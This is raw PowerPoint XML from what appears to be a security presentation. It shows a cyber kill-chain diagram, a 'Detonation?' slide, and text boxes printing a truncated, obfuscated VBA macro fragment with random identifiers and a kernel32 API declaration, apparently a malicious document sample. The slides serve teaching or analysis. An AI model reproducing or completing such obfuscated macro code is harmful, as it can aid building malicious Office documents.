              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 4 h 10"/>
                  <a:gd name="T2" fmla="*/ 5 w 16"/>
                  <a:gd name="T3" fmla="*/ 10 h 10"/>
                  <a:gd name="T4" fmla="*/ 11 w 16"/>
                  <a:gd name="T5" fmla="*/ 10 h 10"/>
                  <a:gd name="T6" fmla="*/ 16 w 16"/>
                  <a:gd name="T7" fmla="*/ 4 h 10"/>
                  <a:gd name="T8" fmla="*/ 0 w 16"/>
                  <a:gd name="T9" fmla="*/ 4 h 10"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="16" h="10">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="10"/>
                      <a:pt x="5" y="10"/>
                      <a:pt x="5" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="9"/>
                      <a:pt x="9" y="9"/>
                      <a:pt x="11" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="4"/>
                      <a:pt x="16" y="4"/>
                      <a:pt x="16" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="0"/>
                      <a:pt x="4"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 name="Freeform 31"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10619597" y="3698151"/>
              <a:ext cx="302450" cy="266990"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 290"/>
                <a:gd name="T1" fmla="*/ 0 h 256"/>
                <a:gd name="T2" fmla="*/ 0 w 290"/>
                <a:gd name="T3" fmla="*/ 0 h 256"/>
                <a:gd name="T4" fmla="*/ 0 w 290"/>
                <a:gd name="T5" fmla="*/ 55 h 256"/>
                <a:gd name="T6" fmla="*/ 0 w 290"/>
                <a:gd name="T7" fmla="*/ 64 h 256"/>
                <a:gd name="T8" fmla="*/ 0 w 290"/>
                <a:gd name="T9" fmla="*/ 256 h 256"/>
                <a:gd name="T10" fmla="*/ 290 w 290"/>
                <a:gd name="T11" fmla="*/ 256 h 256"/>
                <a:gd name="T12" fmla="*/ 290 w 290"/>
                <a:gd name="T13" fmla="*/ 69 h 256"/>
                <a:gd name="T14" fmla="*/ 290 w 290"/>
                <a:gd name="T15" fmla="*/ 55 h 256"/>
                <a:gd name="T16" fmla="*/ 290 w 290"/>
                <a:gd name="T17" fmla="*/ 19 h 256"/>
                <a:gd name="T18" fmla="*/ 131 w 290"/>
                <a:gd name="T19" fmla="*/ 19 h 256"/>
                <a:gd name="T20" fmla="*/ 113 w 290"/>
                <a:gd name="T21" fmla="*/ 0 h 256"/>
                <a:gd name="T22" fmla="*/ 272 w 290"/>
                <a:gd name="T23" fmla="*/ 237 h 256"/>
                <a:gd name="T24" fmla="*/ 18 w 290"/>
                <a:gd name="T25" fmla="*/ 237 h 256"/>
                <a:gd name="T26" fmla="*/ 18 w 290"/>
                <a:gd name="T27" fmla="*/ 73 h 256"/>
                <a:gd name="T28" fmla="*/ 272 w 290"/>
                <a:gd name="T29" fmla="*/ 73 h 256"/>
                <a:gd name="T30" fmla="*/ 272 w 290"/>
                <a:gd name="T31" fmla="*/ 237 h 256"/>
                <a:gd name="T32" fmla="*/ 272 w 290"/>
                <a:gd name="T33" fmla="*/ 55 h 256"/>
                <a:gd name="T34" fmla="*/ 18 w 290"/>
                <a:gd name="T35" fmla="*/ 55 h 256"/>
                <a:gd name="T36" fmla="*/ 18 w 290"/>
                <a:gd name="T37" fmla="*/ 19 h 256"/>
                <a:gd name="T38" fmla="*/ 104 w 290"/>
                <a:gd name="T39" fmla="*/ 19 h 256"/>
                <a:gd name="T40" fmla="*/ 122 w 290"/>
                <a:gd name="T41" fmla="*/ 37 h 256"/>
                <a:gd name="T42" fmla="*/ 272 w 290"/>
                <a:gd name="T43" fmla="*/ 37 h 256"/>
                <a:gd name="T44" fmla="*/ 272 w 290"/>
                <a:gd name="T45" fmla="*/ 5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 h="256">
                  <a:moveTo>
                    <a:pt x="113" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="69"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="272" y="237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="237"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="272" y="55"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27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7" name="Freeform 276"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4276861" y="3831016"/>
              <a:ext cx="981075" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 981075"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 0"/>
                <a:gd name="connsiteX1" fmla="*/ 981075 w 981075"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 0"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="981075" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875">
              <a:solidFill>
                <a:schemeClr val="bg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8" name="Freeform 277"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6010403" y="3831016"/>
              <a:ext cx="914400" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 981075"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 0"/>
                <a:gd name="connsiteX1" fmla="*/ 981075 w 981075"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 0"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="981075" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875">
              <a:solidFill>
                <a:schemeClr val="bg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9" name="Freeform 278"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7699913" y="3831016"/>
              <a:ext cx="914400" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 981075"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 0"/>
                <a:gd name="connsiteX1" fmla="*/ 981075 w 981075"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 0"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="981075" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875">
              <a:solidFill>
                <a:schemeClr val="bg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0" name="Freeform 279"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9378780" y="3831016"/>
              <a:ext cx="914400" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 981075"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 0"/>
                <a:gd name="connsiteX1" fmla="*/ 981075 w 981075"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 0"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="981075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="981075" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875">
              <a:solidFill>
                <a:schemeClr val="bg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71" name="Group 270"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="334736" y="2738922"/>
              <a:ext cx="11884388" cy="758340"/>
              <a:chOff x="277450" y="2136632"/>
              <a:chExt cx="11884388" cy="647202"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129" name="Rectangle 128"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="277450" y="2136632"/>
                <a:ext cx="11884388" cy="6472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0" name="Rectangle 129"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="367162" y="2204725"/>
                <a:ext cx="1603290" cy="511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t>RECONNAISSANCE</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="131" name="Rectangle 130"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2051521" y="2204725"/>
                <a:ext cx="1603287" cy="511013"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="B2D4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t>WEAPONIZATION/</a:t>
                </a:r>
                <a:b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t>INFRASTRUCTURE </a:t>
                </a:r>
                <a:b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gradFill>
                      <a:gsLst>
                        <a:gs pos="0">
                          <a:srgbClr val="282828"/>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:srgbClr val="282828"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="1"/>
                    </a:gradFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>SETUP</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="132" name="Rectangle 131"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3735877" y="2204725"/>
                <a:ext cx="1603287" cy="511013"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="7FB8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DELIVERY</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="133" name="Rectangle 132"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5420233" y="2204728"/>
                <a:ext cx="1603287" cy="511013"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="4095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EXPLOITATION</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="134" name="Rectangle 133"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7104589" y="2204728"/>
                <a:ext cx="1603287" cy="511013"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="4095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INSTALLATION</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="135" name="Rectangle 134"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8788945" y="2204728"/>
                <a:ext cx="1603287" cy="5110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C2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="166" name="Rectangle 165"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10473298" y="2204728"/>
                <a:ext cx="1603287" cy="5110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058" tIns="40029" rIns="80058" bIns="40029"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ACTIONS </a:t>
                </a:r>
                <a:b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br>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="70796">
                          <a:schemeClr val="bg1"/>
                        </a:gs>
                        <a:gs pos="22000">
                          <a:schemeClr val="bg1"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="1"/>
                    </a:gradFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>ON INTENT</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712094" y="1973262"/>
            <a:ext cx="1756919" cy="4077199"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>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0" name="Rounded Rectangle 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5451676" y="1973261"/>
            <a:ext cx="1756919" cy="4077199"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>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32109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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16"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fade">
                                      <p:cBhvr>
                                        <p:cTn id="24"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Detonation?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503237" y="1212849"/>
            <a:ext cx="8229600" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1E1E1E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VB_Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "Sg4H8a2snIHP4xK"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Public Function xki6L8mqtQ0ozcI(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ByVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> JSb4Ora5tv As Integer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ByVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> liYA5YlWC As Variant) As Variant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dim UsQ2uSe88ea1 As Integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dim jzs7U5 As Integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dim c8BXPU As Integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dim LrtUkopVK2jN As Integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eijYuhL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As Integer, jHL4QnMI1UkOF6 As Integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>On Error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GoTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> BoVCD5N3T0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ThisDocument.D6hG9UqMW2sdKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xki6L8mqtQ0ozcI = liYA5YlWC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exit Function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BoVCD5N3T0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c8BXPU = ZKHa67bidtfu(liYA5YlWC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jzs7U5 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ThisDocument.AUsmTZj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(JSb4Ora5tv, c8BXPU)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UsQ2uSe88ea1 = c8BXPU / jzs7U5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>For jHL4QnMI1UkOF6 = ThisDocument.MkNcK9 To jzs7U5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eijYuhL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0 To UsQ2uSe88ea1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xki6L8mqtQ0ozcI = zfF40kszAh1zU.zqvhMF4qd(xki6L8mqtQ0ozcI, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809221" y="1212849"/>
            <a:ext cx="10820400" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1E1E1E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Private Declare Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CloseHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Lib "kernel32"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hObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> As Long) As Long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
